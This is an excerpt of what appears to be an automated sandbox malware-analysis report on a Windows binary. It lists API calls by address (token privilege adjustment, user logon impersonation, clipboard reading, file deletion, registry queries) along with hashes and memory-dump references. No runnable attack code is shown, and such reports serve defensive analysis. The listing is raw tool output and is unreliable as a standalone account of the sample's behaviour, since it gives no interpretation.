                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 00BF3A76
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF8577: _wcslen.LIBCMT ref: 00BF858A
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00C30A84,?,?,00000000,?,00C30A84,00000000,0000000C), ref: 00C30737
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,00C5D840), ref: 00C5EAB1
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindFirstFileW.KERNEL32(?,?), ref: 00C5DCCB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 00C5DD1B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 00C5DD2C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5DC54: FindClose.KERNEL32(00000000), ref: 00C5DD43
                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 00C6666E
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00C5205A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00C52087
                                                                                                                                                                                                                                                                              • Part of subcall function 00C52010: GetLastError.KERNEL32 ref: 00C52097
                                                                                                                                                                                                                                                                            • LogonUserW.ADVAPI32(?,?,?,00000000,00000000,?), ref: 00C51BD2
                                                                                                                                                                                                                                                                            • DuplicateTokenEx.ADVAPI32(?,00000000,00000000,00000002,00000001,?), ref: 00C51BF4
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(?), ref: 00C51C05
                                                                                                                                                                                                                                                                            • OpenWindowStationW.USER32(winsta0,00000000,00060000), ref: 00C51C1D
                                                                                                                                                                                                                                                                            • GetProcessWindowStation.USER32 ref: 00C51C36
                                                                                                                                                                                                                                                                            • SetProcessWindowStation.USER32(00000000), ref: 00C51C40
                                                                                                                                                                                                                                                                            • OpenDesktopW.USER32(default,00000000,00000000,00060081), ref: 00C51C5C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A0B: AdjustTokenPrivileges.ADVAPI32(?,00000000,?,00000000,00000000,00000000,?,00C51B48), ref: 00C51A20
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A0B: CloseHandle.KERNEL32(?,?,00C51B48), ref: 00C51A35
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: StationTokenWindow$AdjustCloseHandleOpenPrivilegesProcess$DesktopDuplicateErrorLastLogonLookupPrivilegeUserValue
                                                                                                                                                                                                                                                                            • String ID: $default$winsta0
                                                                                                                                                                                                                                                                            • API String ID: 22674027-1027155976
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00C51A60
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A6C
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A7B
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: HeapAlloc.KERNEL32(00000000,?,00000000,00000000,?,?,00C514E7,?,?,?), ref: 00C51A82
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51A45: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 00C51A99
                                                                                                                                                                                                                                                                            • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00C51518
                                                                                                                                                                                                                                                                            • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 00C5154C
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C51563
                                                                                                                                                                                                                                                                            • GetAce.ADVAPI32(?,00000000,?), ref: 00C5159D
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 00C515B9
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?), ref: 00C515D0
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000008,00000008), ref: 00C515D8
                                                                                                                                                                                                                                                                            • HeapAlloc.KERNEL32(00000000), ref: 00C515DF
                                                                                                                                                                                                                                                                            • GetLengthSid.ADVAPI32(?,00000008,?), ref: 00C51600
                                                                                                                                                                                                                                                                            • CopySid.ADVAPI32(00000000), ref: 00C51607
                                                                                                                                                                                                                                                                            • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00C51636
                                                                                                                                                                                                                                                                            • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00C51658
                                                                                                                                                                                                                                                                            • SetUserObjectSecurity.USER32(?,00000004,?), ref: 00C5166A
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C51691
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C51698
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C516A1
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516A8
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,00000000), ref: 00C516B1
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516B8
                                                                                                                                                                                                                                                                            • GetProcessHeap.KERNEL32(00000000,?), ref: 00C516C4
                                                                                                                                                                                                                                                                            • HeapFree.KERNEL32(00000000), ref: 00C516CB
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: GetProcessHeap.KERNEL32(00000008,00C514FD,?,00000000,?,00C514FD,?), ref: 00C51AED
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: HeapAlloc.KERNEL32(00000000,?,00000000,?,00C514FD,?), ref: 00C51AF4
                                                                                                                                                                                                                                                                              • Part of subcall function 00C51ADF: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00000000,?,00C514FD,?), ref: 00C51B03
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Heap$Process$Security$Free$AllocDescriptorLengthObjectUser$Dacl$CopyErrorInformationInitializeLast
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 4175595110-0
                                                                                                                                                                                                                                                                            • Opcode ID: 1344366a7b5d87df8e54891fcff061e94075fdb9a83ccfbac3cb5534778dd8ea
                                                                                                                                                                                                                                                                            • Instruction ID: 2794cfa763d2f623aa70e667499e9eb4f0b9acaeed87610a060f6404b50949ca
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 1344366a7b5d87df8e54891fcff061e94075fdb9a83ccfbac3cb5534778dd8ea
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 22715EB9900209ABDF10DFA5DC48FAEBBB8FF04351F184515FD26A7190DB319A49CB68
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • OpenClipboard.USER32(00C8DCD0), ref: 00C6F586
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000D), ref: 00C6F594
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000D), ref: 00C6F5A0
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F5AC
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F5E4
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F5EE
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F619
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(00000001), ref: 00C6F626
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(00000001), ref: 00C6F62E
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F63F
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F67F
                                                                                                                                                                                                                                                                            • IsClipboardFormatAvailable.USER32(0000000F), ref: 00C6F695
                                                                                                                                                                                                                                                                            • GetClipboardData.USER32(0000000F), ref: 00C6F6A1
                                                                                                                                                                                                                                                                            • GlobalLock.KERNEL32(00000000), ref: 00C6F6B2
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,000000FF,00000000,00000000), ref: 00C6F6D4
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6F6F1
                                                                                                                                                                                                                                                                            • DragQueryFileW.SHELL32(00000000,?,?,00000104), ref: 00C6F72F
                                                                                                                                                                                                                                                                            • GlobalUnlock.KERNEL32(00000000), ref: 00C6F750
                                                                                                                                                                                                                                                                            • CountClipboardFormats.USER32 ref: 00C6F771
                                                                                                                                                                                                                                                                            • CloseClipboard.USER32 ref: 00C6F7B6
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Clipboard$Global$AvailableCloseDataDragFileFormatLockQueryUnlock$CountFormatsOpen
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 420908878-0
                                                                                                                                                                                                                                                                            • Opcode ID: f559293884196e7cfed6a39c75faa7d57fb374df8ed1b539fa771539d6909b20
                                                                                                                                                                                                                                                                            • Instruction ID: 04ad0699424bc42a25939e210914d7743f1cd978d863bb8dc56f2f7c4a3f5c3d
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: f559293884196e7cfed6a39c75faa7d57fb374df8ed1b539fa771539d6909b20
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 0961DF35204205AFD310EF24E885F2AB7E4AF84314F1444ADF956C72E2DB31EE4ACB62
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00C67403
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C67457
                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C67493
                                                                                                                                                                                                                                                                            • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 00C674BA
                                                                                                                                                                                                                                                                              • Part of subcall function 00BFB329: _wcslen.LIBCMT ref: 00BFB333
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C674F7
                                                                                                                                                                                                                                                                            • FileTimeToSystemTime.KERNEL32(?,?), ref: 00C67524
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                             • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Time$File$FindLocalSystem$CloseFirst_wcslen
                                                                                                                                                                                                                                                                            • String ID: %02d$%03d$%4d$%4d%02d%02d%02d%02d%02d$%4d%02d%02d%02d%02d%02d%03d
                                                                                                                                                                                                                                                                            • API String ID: 3830820486-3289030164
                                                                                                                                                                                                                                                                            • Opcode ID: 7402cdc57259541961a13ee10cc204351ae732ead3419f152f5636aafbf3ce75
                                                                                                                                                                                                                                                                            • Instruction ID: 06575e3a49b67b5c4886fec2891ee29d60d60f5ba6cf36c689ecfb3b5e698cc0
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 7402cdc57259541961a13ee10cc204351ae732ead3419f152f5636aafbf3ce75
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 4BD15E72508308AEC710EB64C885EBFB7ECAF88704F44495DF695D7192EB74DA48CB62
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C6A0A8
                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?), ref: 00C6A0E6
                                                                                                                                                                                                                                                                            • SetFileAttributesW.KERNEL32(?,?), ref: 00C6A100
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C6A118
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A123
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6A13F
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6A18F
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CB7B94), ref: 00C6A1AD
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6A1B7
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A1C4
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A1D4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$AttributesCurrentDirectoryFirstNext
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 1409584000-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 4b5d65d589b465b55b27fd3fdfe81b114356696f0eef0a9b57ec9f39519e73cb
                                                                                                                                                                                                                                                                            • Instruction ID: 784e8d11831243c8843772f8b0928c1a3eef22dd1a4efb0fe3a59e593887036e
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4b5d65d589b465b55b27fd3fdfe81b114356696f0eef0a9b57ec9f39519e73cb
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: B431B532600219ABDB24AFB4DC89BDE77AC9F46360F100165E826F21D0EB74DE859F65
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00C64785
                                                                                                                                                                                                                                                                            • _wcslen.LIBCMT ref: 00C647B2
                                                                                                                                                                                                                                                                            • CreateDirectoryW.KERNEL32(?,00000000), ref: 00C647E2
                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00C64803
                                                                                                                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(?), ref: 00C64813
                                                                                                                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00C6489A
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C648A5
                                                                                                                                                                                                                                                                            • CloseHandle.KERNEL32(00000000), ref: 00C648B0
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove_wcslen
                                                                                                                                                                                                                                                                            • String ID: :$\$\??\%s
                                                                                                                                                                                                                                                                            • API String ID: 1149970189-3457252023
                                                                                                                                                                                                                                                                            • Opcode ID: 87366bdb583eed73f2d48073180ee3807b1d33a2f905b7ee17cb96d5cbb98b0a
                                                                                                                                                                                                                                                                            • Instruction ID: 69e1e18abbdfc4fc20450b45a04d07c604d2635a0c8a283f2beb5554caeab9ec
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 87366bdb583eed73f2d48073180ee3807b1d33a2f905b7ee17cb96d5cbb98b0a
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D031907150024AAADB209BA0DC89FEF37BCEF89751F1041B6F51AD20A0E7709B84DB64
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?,74DE8FB0,?,00000000), ref: 00C6A203
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,?), ref: 00C6A25E
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A269
                                                                                                                                                                                                                                                                            • FindFirstFileW.KERNEL32(*.*,?), ref: 00C6A285
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(?), ref: 00C6A2D5
                                                                                                                                                                                                                                                                            • SetCurrentDirectoryW.KERNEL32(00CB7B94), ref: 00C6A2F3
                                                                                                                                                                                                                                                                            • FindNextFileW.KERNEL32(00000000,00000010), ref: 00C6A2FD
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A30A
                                                                                                                                                                                                                                                                            • FindClose.KERNEL32(00000000), ref: 00C6A31A
                                                                                                                                                                                                                                                                              • Part of subcall function 00C5E399: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 00C5E3B4
                                                                                                                                                                                                                                                                            Strings
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: Find$File$Close$CurrentDirectoryFirstNext$Create
                                                                                                                                                                                                                                                                            • String ID: *.*
                                                                                                                                                                                                                                                                            • API String ID: 2640511053-438819550
                                                                                                                                                                                                                                                                            • Opcode ID: 4914006c9e4adcb7c0f1724a5d3a8190a60fdc75ff52f355f36c0ac6c8cd7517
                                                                                                                                                                                                                                                                            • Instruction ID: a06b8e304b8120a2973cc438d06fd7cc2b77c4f4aeb4350a70bc8783a9768ee4
                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 4914006c9e4adcb7c0f1724a5d3a8190a60fdc75ff52f355f36c0ac6c8cd7517
                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8A31123154021AABCB20AFA5DC89FDE77ACAF45324F1041A1E825B31E0DB31DF859F29
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00C7C10E,?,?), ref: 00C7D415
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D451
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4C8
                                                                                                                                                                                                                                                                              • Part of subcall function 00C7D3F8: _wcslen.LIBCMT ref: 00C7D4FE
                                                                                                                                                                                                                                                                            • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00C7C99E
                                                                                                                                                                                                                                                                            • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?,?,?), ref: 00C7CA09
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7CA2D
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 00C7CA8C
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 00C7CB47
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CBB4
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CC49
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,00000000,?,?,?,00000000), ref: 00C7CC9A
                                                                                                                                                                                                                                                                            • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,?,?,00000000), ref: 00C7CD43
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(?,?,00000000), ref: 00C7CDE2
                                                                                                                                                                                                                                                                            • RegCloseKey.ADVAPI32(00000000), ref: 00C7CDEF
                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                            • Source File: 0000000A.00000002.2592377466.0000000000BF1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00BF0000, based on PE: true
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592339533.0000000000BF0000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000C8D000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592445446.0000000000CB3000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592492938.0000000000CBD000.00000004.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            • Associated: 0000000A.00000002.2592773756.0000000000CC5000.00000002.00000001.01000000.00000008.sdmp
                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_10_2_bf0000_Relationship.jbxd
                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                            • API ID: QueryValue$Close_wcslen$BuffCharConnectOpenRegistryUpper
                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                            • API String ID: 3102970594-0
                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                              • Part of subcall function 00BF5851: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,00BF55D1,?,?,00C34B76,?,?,00000100,00000000,00000000,CMDLINE), ref: 00BF5871
